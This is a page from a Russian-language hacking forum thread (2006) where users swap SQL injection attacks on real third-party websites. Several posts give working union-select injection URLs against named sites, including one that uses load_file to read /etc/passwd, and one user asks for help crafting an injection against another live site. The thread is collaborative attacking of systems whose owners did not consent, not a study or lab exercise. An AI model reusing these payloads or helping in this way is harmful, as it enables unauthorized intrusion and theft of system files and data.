HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL-inj, FILE_LOAD Запрещен.
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 20.12.2006, 18:45
SQLHACK
Голос разума
Регистрация: 27.09.2006
Сообщений: 529
С нами: 10326626

Репутация: 1617


По умолчанию
Цитата:
Сообщение от Macro  
"DROP DATABASE" [name | name expression]

name
The name of the databse.
Задвинул блин ой не могу
 
Ответить с цитированием

  #12  
Старый 20.12.2006, 20:27
vmn
Познающий
Регистрация: 16.10.2006
Сообщений: 82
С нами: 10299266

Репутация: 33
По умолчанию
Гага, это ты через инъекцию в mysql собрался делать?) Удачи. Несколько команд в одном запросе не поддерживаются.
 
Ответить с цитированием

  #13  
Старый 20.12.2006, 20:29
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию
вопрос. если нет mysql.user, юзеров и тд. .. то что ты вообще хочешь ?))))
можешь xss провести =) но нах если там нет юзеров ? =)
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #14  
Старый 21.12.2006, 01:23
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
С нами: 10227581

Репутация: 175
Question
Аналогично File_load не катит !
Подобрал только кол-во полей!

http://www.prodaem.com/site/add.php?section=39'+union+select+1,1,1,1+/*
 
Ответить с цитированием

  #15  
Старый 21.12.2006, 01:42
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
С нами: 10957346

Репутация: 2727


По умолчанию
Цитата:
Сообщение от *D1VER  
Аналогично File_load не катит !
Подобрал только кол-во полей!

http://www.prodaem.com/site/add.php?section=39'+union+select+1,1,1,1+/*
3.14*ишь..
что ты сделал чтобы вообе что нибудь выводило?
все пашет http://www.prodaem.com/site/add.php?section=-39'+union+select+0,load_file('/etc/passwd'),2,4'
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #16  
Старый 21.12.2006, 01:49
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
С нами: 10227581

Репутация: 175
Thumbs up
Очень интересно значит я неправильно всё сделал!

Буду знать СпС!
 
Ответить с цитированием

  #17  
Старый 21.12.2006, 05:09
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
С нами: 10227581

Репутация: 175
По умолчанию
http://www.4event.ru/rub33.php?binn_rubrik_pl_catelems4=-1+union+select+null,null+/*

А с этим можно что нибудь сделать? Пробовал загрузить ('/etc/passwd')
Ну не в какую! Как сформировать запрос можно?
 
Ответить с цитированием

  #18  
Старый 21.12.2006, 08:38
gadjet
Познающий
Регистрация: 17.12.2005
Сообщений: 78
С нами: 10735477

Репутация: 23
По умолчанию
Вопрос немного не в тему: что значит, когда MySQL хэш начинается с символа '*' ?
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.